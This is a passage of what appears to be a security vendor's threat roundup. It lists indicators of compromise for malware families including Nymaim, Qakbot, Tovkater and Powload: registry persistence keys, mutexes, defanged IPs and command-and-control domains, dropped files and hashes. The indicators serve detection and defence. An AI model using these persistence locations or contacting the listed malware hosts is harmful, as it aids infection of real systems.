<HKLM>\System\CurrentControlSet\Services\NapAgent\Shas 25
<HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs 25
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2 25
<HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI 25
<HKLM>\System\CurrentControlSet\Control\Session Manager 25
<HKU>\Software\Microsoft\Windows\ShellNoRoam\MUICache 25
<HKCU>\CONTROL PANEL\DESKTOP
Value Name: Wallpaper
25
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
25
<HKLM>\SYSTEM\ControlSet001\Control\Session Manager 25
<HKLM>\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\189271E573FED295A8C130EAF357A20C4A9F115E 9
<HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel 6
MutexesOccurrences
Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb725
shell.{381828AA-8B28-3374-1B67-35680555C5EF}25
\BaseNamedObjects\shell.{718951EE-6DB9-E41A-53AA-8B715AE18B45}2
\BaseNamedObjects\shell.{493BC5E1-8EB5-5EFC-281D-65B759CEECC3}2
\BaseNamedObjects\shell.{B1A92788-E01E-5F0F-2EBD-8C1B64B4440E}1
\BaseNamedObjects\shell.{3B5BBD57-DC86-C667-6198-1ED86151C492}1
\BaseNamedObjects\shell.{3290A7F9-5947-C52F-A9C4-FFC568696593}1
\BaseNamedObjects\shell.{A90EDFAB-A502-430E-BDBC-2A277AABA37D}1
\BaseNamedObjects\shell.{FCDAE584-CD77-B6D4-3AF3-33D1E72CBBA2}1
\BaseNamedObjects\shell.{5ED88314-B21B-6A1E-9E28-1194C46E655A}1
\BaseNamedObjects\shell.{0382099C-AC13-59BE-3A2C-B533D776D30C}1
\BaseNamedObjects\shell.{8A1F6AB1-121B-A240-F2AC-6815C5405429}1
\BaseNamedObjects\shell.{6B956E68-ABAA-AB50-EB9F-299C556E0FC1}1
\BaseNamedObjects\shell.{D593CF55-EF38-7E41-B3D1-189932BF5ACA}1
\BaseNamedObjects\shell.{6E8CD1E8-3AA4-8152-A1AC-9DF81B4CF52F}1
\BaseNamedObjects\shell.{CA80F6A6-97F3-B746-F936-72E156EADCA1}1
\BaseNamedObjects\shell.{77337C05-6A9D-48D8-548B-5BC4EDE52644}1
\BaseNamedObjects\shell.{5F59AF38-9EAC-3B8F-A08E-700EC4307348}1
\BaseNamedObjects\shell.{1DEF893E-C150-B52C-8B2C-18DC50905097}1
\BaseNamedObjects\shell.{114716B6-D98A-FB35-E73B-ABDB1C2ECBE3}1
\BaseNamedObjects\shell.{940BFEC0-D658-3349-9964-7D4820AF7C5D}1
\BaseNamedObjects\shell.{DCA07E8B-8FF0-AAD5-5A30-43E0A4FC3355}1
\BaseNamedObjects\shell.{9F3E7036-D399-5D1C-15F0-27F90C81CEA7}1
\BaseNamedObjects\shell.{4D979936-6ECD-C1FC-8B7E-C65E6397B59E}1
\BaseNamedObjects\shell.{2981A90C-3618-499B-5205-FD704DC8D53D}1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
178[.]33[.]160[.]17625
178[.]33[.]160[.]17525
178[.]33[.]160[.]17825
178[.]33[.]160[.]17725
178[.]33[.]160[.]17925
178[.]33[.]160[.]17025
178[.]33[.]160[.]17225
178[.]33[.]160[.]17125
178[.]33[.]160[.]19625
178[.]33[.]160[.]19525
178[.]33[.]160[.]19825
178[.]33[.]160[.]19725
178[.]33[.]160[.]19925
178[.]33[.]160[.]19025
178[.]33[.]160[.]19225
178[.]33[.]160[.]19125
178[.]33[.]160[.]19425
178[.]33[.]160[.]19325
178[.]33[.]159[.]3125
178[.]33[.]159[.]3025
178[.]33[.]159[.]2925
178[.]33[.]159[.]2825
178[.]33[.]159[.]2725
178[.]33[.]159[.]2625
178[.]33[.]159[.]2525
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]blockcypher[.]com25
chain[.]so13
bitaps[.]com13
btc[.]blockr[.]io13
hjhqmbxyinislkkt[.]1j9r76[.]top12
www[.]coinbase[.]com9
p27dokhpz2n7nvgr[.]1j9r76[.]top6
hjhqmbxyinislkkt[.]1bxzyr[.]top3
Files and or directories createdOccurrences
%HOMEPATH%\Documents\OneNote Notebooks\Personal\General.one25
%HOMEPATH%\Documents\OneNote Notebooks\Personal\Unfiled Notes.one25
%HOMEPATH%\Documents\Outlook Files\Outlook.pst25
%HOMEPATH%\Documents\RILLReturn.ppt25
%HOMEPATH%\Documents\SerialsOverview.ppt25
%HOMEPATH%\Documents\TSR_Observations_2-14-2007.doc25
%HOMEPATH%\Documents\VISSpring13Schedule.pdf25
%HOMEPATH%\Documents\booklaunch_e.doc25
%HOMEPATH%\Documents\featureb0906.pdf25
%HOMEPATH%\Documents\genealogy.ppt25
%HOMEPATH%\Documents\greenpaper.doc25
%HOMEPATH%\Documents\james_harrison_public_forum_presentation_e.doc25
%HOMEPATH%\Documents\self-guided_SoE_Tour.pdf25
%HOMEPATH%\Documents\sshws_2012rev.pdf25
%HOMEPATH%\Documents\timeentrylimit.xlsx25
%HOMEPATH%\Documents\workshopagenda10may2001_e.doc25
%TEMP%\d19ab98925
%TEMP%\d19ab989\4710.tmp25
%TEMP%\d19ab989\a35f.tmp25
%LOCALAPPDATA%\Microsoft\Office\Groove\System\CSMIPC.dat25
\DAV RPC SERVICE25
\Device\Null25
%APPDATA%\Microsoft\Outlook\Outlook.srs25
%APPDATA%\Microsoft\Outlook\Outlook.xml25
%HOMEPATH%\Local Settings\Application Data\Microsoft\Office\ONetConfig\21d4feba3519c30e149fdf62432f198a.xml25
See JSON for more IOCs
File Hashes
  • 0536d5867571e0ed9998dfe458e7cf42334a9abc67e1cbd9ea3004507f899e3c
  • 17f6fab817ae1a1ac4478c121c3dcfed044924ba4beac8cae734cd14d453596b
  • 212ef6edb374b8aab38ad19fa15e2e2f4674b7d2cbb024f36b9477fc71c71769
  • 276438f97b45ccd5ff93586ae0adfa3c4e4ba92f1adc87fca607eb6d6bd17919
  • 2b7669616638e5976b1c65b492d9e775ab668648d0b2ca5df81bcbe26b7e1123
  • 33dcb7c8ce845f1840cb6508a67595d415227babe474eae0f3a06383eab16e63
  • 3d5bab5798ad6d27131075732d829b90f3f37d5e63bab43b53a071c002678fce
  • 418a712f9e44f3adba6125d9f3d7ad4a52ffef9d8ad5b485e903a984a4cd8c63
  • 420dc43a8c9200df4138d720415304017b861b3cfddfb5de16af50099f3b0e37
  • 436e308c38fb3872fe1a64be90eed2a86d7f9806cd163c83e83fbfd0edf3f8d8
  • 55e8cb67e967b51aacd85258cc4c5a2d8c7c2ad48e44d6f4ecf9c0a721d4fbfe
  • 57de16edb0bd7e590ad1adf4474b18eb968d72781f0d34f33ee51cf6ed71763e
  • 5da318b569c3cbad701f06f4b26905c5ac95048b748481fae2552653acdeb25b
  • 629c1b76328b10077af530bfc5526fcb5592eefd8fb0b618179a8429bf6b6259
  • 64b193a1fcdd2d2ec2444e989ecb9283a5f7679abfc5dc3efa9a248793e0197c
  • 6e7bc2af711eac2a82384b3738229d3b69f60f1522a0c59f781f4d6731b1f198
  • 763b5c07061e6f306399991efd08ac8b9efb74c37ab6280c840a779fb7ca929c
  • 77ee427b01cecdc4adcdee50b679ddab7ae6175a9ec3ec199b81cbfb3684a172
  • 7e93d6b812b9ba8833a2f6727e35714ae301c8ab8ac9988ae540f4a993e41c05
  • 84d4734cd55e627870c58fe07bd29895cc40726ea235de6980c1ebe73c8f838c
  • 9d60618b662ed064573688abf10cb3eb562b46baceb864a4343e8851b2e6686e
  • a2dd530ea97e84d507d13eccef73f736ef1c7c2722b82c84e6d84c61f9406f9b
  • a6943fd03952cc9d1b7a492ca30cc75ecaefdb54e20af0fc0dcbbcc93483d031
  • a9efbbec61b1901e23bd5d29f2e1c34e9d0e7c41dbd216386ec52489239068fe
  • b0ba2997331995d24a85a7d4f586fcaaeb4e6b62de46f068d165ef0d13b172cc
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid


Umbrella

Malware

Win.Dropper.Nymaim-6956636-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\Software\Microsoft\GOCFK 19
<HKLM>\Software\Wow6432Node\Microsoft\Tracing\tapi3 19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: EnableFileTracing
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: EnableConsoleTracing
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: FileTracingMask
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: ConsoleTracingMask
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: MaxFileSize
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: FileDirectory
19
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
19
<HKCU>\Software\Microsoft\FROD 18
MutexesOccurrences
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}19
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}19
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}19
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}19
Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}19
Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}19
Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}19
Local\{B888AC68-15DA-9362-2153-60CCDE3753D5}19
Local\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E}19
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
otmqa[.]in18
nuyfyp[.]in18
omctebl[.]pw18
qxqdslcvhs[.]pw18
eyhwvkyswsts[.]in18
lqeyztwnmqw[.]pw18
tgkddewbn[.]in18
bibmbkjvelox[.]net18
mpoghxb[.]net18
zglevl[.]net18
cixhrfbok[.]com18
yqxpvvbvncxr[.]com18
vhmfwvrbln[.]net18
pyioepars[.]com18
iwxbgsvj[.]net18
Files and or directories createdOccurrences
%ProgramData%\ph19
%ProgramData%\ph\fktiipx.ftf19
%TEMP%\gocf.ksv19
%TEMP%\fro.dfx18
\Documents and Settings\All Users\pxs\pil.ohu18
%LOCALAPPDATA%\7z25
%APPDATA%\s2695
%ProgramData%\hm94p643
%LOCALAPPDATA%\28703
%APPDATA%\710i5v83
%ProgramData%\05n33
%ProgramData%\0m23
%ProgramData%\j91z2
%LOCALAPPDATA%\9b82
%APPDATA%\mb312
%ProgramData%\6745h2
%ProgramData%\63h6c2
%LOCALAPPDATA%\546byxl2
%APPDATA%\k5f52
%APPDATA%\1ok411c1
%ProgramData%\84q9q1
%LOCALAPPDATA%\6b0d19t1
%APPDATA%\9980c1
%ProgramData%\2p077d1
%LOCALAPPDATA%\ja68siv1
See JSON for more IOCs
File Hashes
  • 0a79d985e81449aeabc401545955323e3d9fa0951a6fabe8727370679cee362c
  • 2d7e1dee56892ffe3fa7b85e33ef512e8017ce690a1118ad743736ba03c70c29
  • 2f017b1f3b3d430266be3da2be7b050dad8d2bbdfe457d6d053f2ca312c90691
  • 33c2883874a24e9abbd993f5d06b8596483d33a388b4832f7e8ed3585dab0f80
  • 4268fb8266c18ba7392e2ac655dad69b952bcfce10a71b34a821f0ea32a02954
  • 470dad272252de1d8631e7026ee324fa9238f722707a26f56b6377f2588a7b16
  • 4ff4835419292e13a5d7be1fe2b3b6a000a07f733948e5865b09082e91ef364b
  • 50bc7a1d67f67fbe4faaa7e1968addc631ee65c05dffdac6decfd021306d17c7
  • 5814f51e35d047cfd4e2b4d76bb2b401d70a860747b7ba817fe3bb035dea1b98
  • 68e743d3ab393a17a9120260b6e2c1a1fcea3ba32cebc06aa1970d62198f266d
  • 7e95831b38b1a32402ba5b6251180aca1b1cad457be756612b3ffe1ebf40dce2
  • 8b307748efc603648524dc47202a550bfcaee9a3a23da4f99802aef2e789d6cd
  • 9260c5ea2694dd47cbe563d7d39518d4b4f1249499dcae387e2da9955723286f
  • a92aec525fddbe52002ba700344043cd99b8d1323728b9cc2114e64bf83c7ce3
  • aca7c6cb8d0edcb41b44a0f53460ee8ac3078aca97f03979da0b1d4d5dfb860b
  • b01ecd3e51d9efea860568d3ae336c7d3514f08bca6d3ba9c5cfd3ad069ec3fe
  • d618459cbcf86c6797850757003d53db2f8bcc89364bf7de806f89f1736bf1cd
  • d6a5f0855e7e2c8968e90159b42853361187b41d692626273807361c27bd5a37
  • db421df81c436e54428bcaddcb394568afcd6769e88809a2634ea678643ec811

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Dropper.Qakbot-6956539-0


Indicators of Compromise



Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
25
<HKCU>\Software\Microsoft\SystemCertificates\UserDS 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\aqejpwsx 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Type
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Start
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ErrorControl
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ImagePath
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DisplayName
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnService
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnGroup
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: WOW64
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ObjectName
25
<HKLM>\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931 3
<HKLM>\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6 3
Note that other Registry Keys are leveraged that may contain unicode characters. See JSON for more IOCs
MutexesOccurrences
Global\eqfik25
llzeou25
eqfika25
Global\epieuxzk25
Global\ulnahjoi25
Global\utjvfi25
bzqjzpdrfpamvq25
\BaseNamedObjects\Global\uvesyw2
\BaseNamedObjects\Global\vqxcpp2
\BaseNamedObjects\hxsgmprzlpnnqw2
\BaseNamedObjects\Global\imyuiwlg2
\BaseNamedObjects\Global\vtqux2
\BaseNamedObjects\imyuiwlga2
\BaseNamedObjects\yspopald2
\BaseNamedObjects\Global\rhjga2
\BaseNamedObjects\afalya2
\BaseNamedObjects\iykps2
\BaseNamedObjects\Global\ilkcmoq2
\BaseNamedObjects\Global\afaly2
\BaseNamedObjects\Global\dgialgoh2
\BaseNamedObjects\Global\yvbnyn2
\BaseNamedObjects\Global\knpog2
\BaseNamedObjects\crcbzy2
\BaseNamedObjects\Global\esroi2
\BaseNamedObjects\knpoga2
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]12[.]17425
69[.]241[.]80[.]16221
209[.]126[.]124[.]17321
69[.]195[.]124[.]6020
162[.]144[.]12[.]24120
50[.]87[.]150[.]20319
181[.]224[.]138[.]24019
35[.]225[.]160[.]24518
172[.]217[.]164[.]14218
45[.]38[.]189[.]10318
68[.]87[.]56[.]13018
85[.]93[.]89[.]610
209[.]126[.]124[.]1666
207[.]38[.]89[.]1155
85[.]93[.]88[.]2515
69[.]241[.]74[.]1703
69[.]241[.]108[.]583
69[.]241[.]106[.]1023
64[.]34[.]169[.]2442
208[.]100[.]26[.]2341
216[.]218[.]206[.]691
216[.]58[.]217[.]1421
173[.]227[.]247[.]491
173[.]227[.]247[.]541
69[.]64[.]56[.]2441
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
jpfdtbmvuygvyyrebxfxy[.]info25
hknkmwfdngcfavzhqd[.]biz25
ywubouysdukndoakclnr[.]org25
uwujtnymeyeqovftsc[.]org21
kaaovcddwmwwlolecr[.]org21
ijdlykvhnvrnauvz[.]com21
www[.]ip-adress[.]com21
stc-hstn-03[.]sys[.]comcast[.]net21
boston[.]speedtest[.]comcast[.]net21
houston[.]speedtest[.]comcast[.]net21
sanjose[.]speedtest[.]comcast[.]net21
jacksonville[.]speedtest[.]comcast[.]net21
lunkduuumhmgpnoxkbcjqcex[.]org19
hsyglhiwqfc[.]org18
forumity[.]com18
zebxhuvsz[.]com18
yxssppysgteyylwwprsyyvgf[.]com18
fcptxaleu[.]net18
olosnxfocnlmuw[.]biz18
cbqjxatxrumjpyvp[.]biz18
sproccszyne[.]org18
uschunmmotkylgsfe[.]biz18
wgysvrmqugtimwhozoyst[.]biz18
tkpxkpgldkuyjduoauvwoiwcg[.]org18
cufgghfrxaujbdb[.]com18
See JSON for more IOCs
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Windows\Cookies\QA752KCC.txt25
%APPDATA%\Microsoft\Windows\Cookies\QP9V2VPK.txt25
%APPDATA%\Microsoft\Windows\Cookies\QTOORX9Q.txt25
%APPDATA%\Microsoft\Windows\Cookies\RPE3LD3D.txt25
%APPDATA%\Microsoft\Windows\Cookies\RYU7B1BB.txt25
%APPDATA%\Microsoft\Windows\Cookies\RZ1EYTQG.txt25
%APPDATA%\Microsoft\Windows\Cookies\SCT1A3Q5.txt25
%APPDATA%\Microsoft\Windows\Cookies\SL2DQ447.txt25
%APPDATA%\Microsoft\Windows\Cookies\SUA0P3GL.txt25
%APPDATA%\Microsoft\Windows\Cookies\T28YM23R.txt25
%APPDATA%\Microsoft\Windows\Cookies\TC61OXS2.txt25
%APPDATA%\Microsoft\Windows\Cookies\TWNEP5LZ.txt25
%APPDATA%\Microsoft\Windows\Cookies\TX9TW6ML.txt25
%APPDATA%\Microsoft\Windows\Cookies\U5T0RELM.txt25
%APPDATA%\Microsoft\Windows\Cookies\UCPG9KND.txt25
%APPDATA%\Microsoft\Windows\Cookies\UD8XCJVS.txt25
%APPDATA%\Microsoft\Windows\Cookies\UGY2NFKJ.txt25
%APPDATA%\Microsoft\Windows\Cookies\UOVVJUXY.txt25
%APPDATA%\Microsoft\Windows\Cookies\UVFN9CGJ.txt25
%APPDATA%\Microsoft\Windows\Cookies\V6G9AWM4.txt25
%APPDATA%\Microsoft\Windows\Cookies\VFVD9E5C.txt25
%APPDATA%\Microsoft\Windows\Cookies\VK4YOOAG.txt25
%APPDATA%\Microsoft\Windows\Cookies\VP01LDK3.txt25
%APPDATA%\Microsoft\Windows\Cookies\VPK8RY5C.txt25
%APPDATA%\Microsoft\Windows\Cookies\VYUA6F7D.txt25
See JSON for more IOCs
File Hashes
  • 04a19e4e2d700292ba4ce5659e97413112bd079dacdbaf8a2387e6f6559dcba3
  • 117466b3e9dabd69d510d9e034eec875d9ca2ad9dbb8c5d123b388ac2a65ebbf
  • 17d23f910311aeb341ee348586bb212d1cddb70152bc4d1bc31ac579693d7741
  • 1b0573fb381b291b12cf7db4bfb6deb78e688c9c3076908e8581199169b8514a
  • 1c0c7d00ccfb9f12299fd7df7ec2ad497cb6c8fa60b903694f2d2bf54af7c30c
  • 278bc2f23ef0a5a79e36f1dca261bbf67f87aef637e76373061654353fc3f716
  • 33ba38fa1bfaab98c6ba48eb2a2fb3155b51118e9ef79642418e0903e2b2e008
  • 51390b6bde9196f7c0319c1253d08233202f6b4110b8c33557a2d2895f868769
  • 548c5b819c109a61e1ff6bc74bd43ad2702ed44e479dd6600da3bb9d5a9ca72e
  • 5b3cd274c3c0349f7d67238994e53e4a842a82e9e15905510a93b4d6643621e7
  • 611f34dcdcce11b0e48779e0fcfd950437614e603673903c8b342bdd2a34ce1a
  • 620e4f53e698c59971f4633cad4c7966f3432aeec0a6315b82a5dae8c13577c9
  • 6f6e53de5fb48c34cce494113f04e1b32d3dd85d8071023b2dff1febb1686c7f
  • 6fd63887adf0e0d4894d3b648e8be0d20474579f60138915b5e3e3a9761f43bc
  • 783a7e50bddf9b5c9547a8fabc7470fabdbe4410df76148dd6c5c81dfb7e6506
  • 7e7e09137fda05e6292d8d9646ab5bc18fd136b06aa77833819ccc46d79c4859
  • 7e9ab6bf4ee2141f4702e0cf4348340293c429416f7676c7946e940321220375
  • 8412cd2e7e60ac2d32bf43f350f8ce806876f54c2ed9b6d0f895179d289a1803
  • 84e0ad1b2d1ca15e2ea16d6d57b81a63af18f664b171ad9d144e710ad2e3cb75
  • 8786a734c5f7fccca5b87c04c5531bff6ec323a29860063c2ba31941706c83a3
  • 914960db7ffbdd3a5a5a98b740f724c0ab9469fcbdd547561622809e5d3c6396
  • 93ac57e8f8e341c84e25dd0c14f014d23f55e24a175b443f4cd399a086e70965
  • 98170c08d421f79a308074befb2c4e799db06e28ce10cea9d435c5868d1e6f36
  • 9d8dfe92711ea955120f4fdbb3b2d0cf37ff79ac74572c867c44da7d404213fa
  • a0903affbe9bd3176863d83a9e57808aa55a3ea8695d09dbbd2d8f3f1d22e812
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Tovkater-6956309-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\System\CurrentControlSet\Control\Session Manager 25
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
25
<HKLM>\SYSTEM\ControlSet001\Control\Session Manager 25
MutexesOccurrences
N/A-
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
caribz[.]club10
fruitnext[.]top9
mirraclez[.]club5
liquidmiracle[.]top4
SMILESAWAY[.]TOP3
duckandbear[.]top2
skycrimes[.]top2
fowlerfootball[.]top2
gratify[.]triobol[.]ru1
shipboard[.]dicier[.]ru1
giroboard[.]top1
skeleton[.]walforder[.]ru1
shadeunit[.]club1
strangerthingz[.]club1
Files and or directories createdOccurrences
imasrr13.exe22
%TEMP%\nsw2.tmp\nsJSON.dll3
%TEMP%\nso74D7.tmp\INetC.dll1
%TEMP%\nso74D7.tmp\nsJSON.dll1
%TEMP%\nso74D7.tmp\xantacla.exe1
%TEMP%\nsuC6AE.tmp\INetC.dll1
%TEMP%\nsuC6AE.tmp\nsJSON.dll1
%TEMP%\nsuC6AE.tmp\santacla.exe1
%TEMP%\nsj9A32.tmp\INetC.dll1
%TEMP%\nsj9A32.tmp\nsJSON.dll1
%TEMP%\nse1441.tmp\INetC.dll1
%TEMP%\nsj9A32.tmp\xantacla.exe1
%TEMP%\nse1441.tmp\nsJSON.dll1
%TEMP%\nse1441.tmp\santacla.exe1
%TEMP%\nsa3ED.tmp\INetC.dll1
%TEMP%\nsa3ED.tmp\nsJSON.dll1
%TEMP%\nsa3ED.tmp\xantacla.exe1
%TEMP%\nseEB6D.tmp\INetC.dll1
%TEMP%\nseEB6D.tmp\nsJSON.dll1
%TEMP%\nseEB6D.tmp\xantacla.exe1
%TEMP%\nskC2A9.tmp\INetC.dll1
%TEMP%\nskC2A9.tmp\nsJSON.dll1
%TEMP%\nskC2A9.tmp\santacla.exe1
%TEMP%\nsp547C.tmp\INetC.dll1
%TEMP%\nsp547C.tmp\nsJSON.dll1
See JSON for more IOCs
File Hashes
  • 0b1c46b5535b4fc30fd8d813255220d3715d0bd7623e094e684af13a1c12f579
  • 0d806734aacf391b1c304155e8f186d7c354c46d08b5f2cb70c2a6029dba2e0e
  • 1187cf65c782ea451e0a46f8e5ea18f8133cc209d58db1c08793bb086b96df4f
  • 21a9fb85cec099bdc2bf419b9bc07dbe6f9b1dc40b8e2853c119093706d1a3a8
  • 2e23eb71950087f2212e0e591fa462b1706571fe55c87454de7003de4a982d95
  • 30d525e4acb5cbd5dd5fe9508cb0cf053c4b0480ab53168e9a06e58c2e9b323b
  • 35dae148e6507526256336e36eb9858dcf17c73f86c332582cd53af43c887f0a
  • 368e24183133ba0c4a7fb06b255458754e6662d6be0df18f44b7304b7f1438d7
  • 3dc644f5a69d86aeab33c6879bb508b59049d17a74cca73f15b160578ee0a358
  • 42f86e50ca2180192d30c556d001cf8720d17094850164e811872f1c864f10cb
  • 43150f037e396e69ff8e1e1d1da7e33614f100fba6b6133a99174a8bcc56d8c5
  • 46e6b3d8c0cff0c9dca7ee7fae9b15c7b23865f546533ee00be0d594f6d03a40
  • 4b0232b305a8504700570c6e177d0c1815924031908f2f2d5fe61510174804c5
  • 52e70ec3517105cdabea6b3448d4568fbca560683e7e90070d0209ea1a002de7
  • 5b1a72a9d50e9e41662848965957cf3b537a923f12a02d022d7e40bc76d6a59d
  • 5f16228ceca9d4d628bcddf5da07ddd8140b19c3458ba287b5e0a9a4533929c9
  • 626f2dbe08fcf4192f709111ca3f2ce5975cb9ac7bac7b007158b8e74070c403
  • 62bae87f17d56c22f89ec9c41c2e3bf76139df7a4a4c710e088ec9483918cf9b
  • 63d3a47aa0f89009ecc37199d269c8c3184d32e0632c3f1c1857dafd2aee7ae4
  • 67b73d01d619d30bc56d0f772207df38b68a433b1050137bb93a54e746c1c34f
  • 67ffbd39d1ebbceb4936645c822a10b6b71dc289acd026b1b4259f01c2168e8f
  • 6c2eae55f0ff4cb79a53f932a481812c7b8c5d61ff0aadf47c4211d676cc97b4
  • 6d0f17cdc45a3867ec8c89ae3cf9ef2264b4889fc135417857e04d8109ec62ec
  • 7b4c241497ba6cef5a8abc35d4c795e7c8b0b3d4a292a843d14d4389ddef57b7
  • 7dbb52a1de75d201b0565062452e81a210cc597ac4626aa95bf478562aa082cd
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Doc.Downloader.Powload-6956274-0


Indicators of Compromise


Registry KeysOccurrences
<HKCR>\INTERFACE\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} 29
<HKCR>\INTERFACE\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} 29
<HKCR>\INTERFACE\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} 29
<HKCR>\INTERFACE\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} 29
<HKCR>\INTERFACE\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} 29
<HKCR>\INTERFACE\{79176FB2-B7F2-11CE-97EF-00AA006D2776} 29
<HKCR>\INTERFACE\{4C5992A5-6926-101B-9992-00000B65C6F9} 29
<HKCR>\INTERFACE\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} 29
<HKCR>\INTERFACE\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} 29
<HKCR>\INTERFACE\{5CEF5613-713D-11CE-80C9-00AA00611080} 29
<HKCR>\INTERFACE\{92E11A03-7358-11CE-80CB-00AA00611080} 29
<HKCR>\INTERFACE\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} 29
<HKCR>\INTERFACE\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} 29
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\sourcebulk 29
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: Type
29
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: Start
29
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: ErrorControl
29
MutexesOccurrences
Global\I98B68E3C29
Global\M98B68E3C29
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
159[.]0[.]130[.]14929
191[.]92[.]69[.]11529
69[.]25[.]11[.]2829
88[.]198[.]20[.]5729
212[.]129[.]63[.]13224
198[.]58[.]114[.]9118
74[.]208[.]5[.]1516
209[.]85[.]144[.]10910
77[.]111[.]149[.]559
74[.]6[.]141[.]508
173[.]201[.]192[.]2298
74[.]208[.]5[.]27
209[.]85[.]144[.]1087
17[.]36[.]205[.]747
182[.]50[.]145[.]36
67[.]195[.]228[.]956
196[.]35[.]198[.]1346
54[.]88[.]144[.]2116
149[.]255[.]56[.]2426
184[.]106[.]54[.]105
64[.]26[.]60[.]2295
173[.]203[.]187[.]145
205[.]178[.]146[.]2355
212[.]227[.]15[.]1675
212[.]227[.]15[.]1835
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ises[.]com[.]pl29
ingenla[.]com29
hicast[.]tn24
smtp[.]mail[.]com16
secure[.]emailsrvr[.]com14
smtpout[.]secureserver[.]net14
smtp[.]office365[.]com13
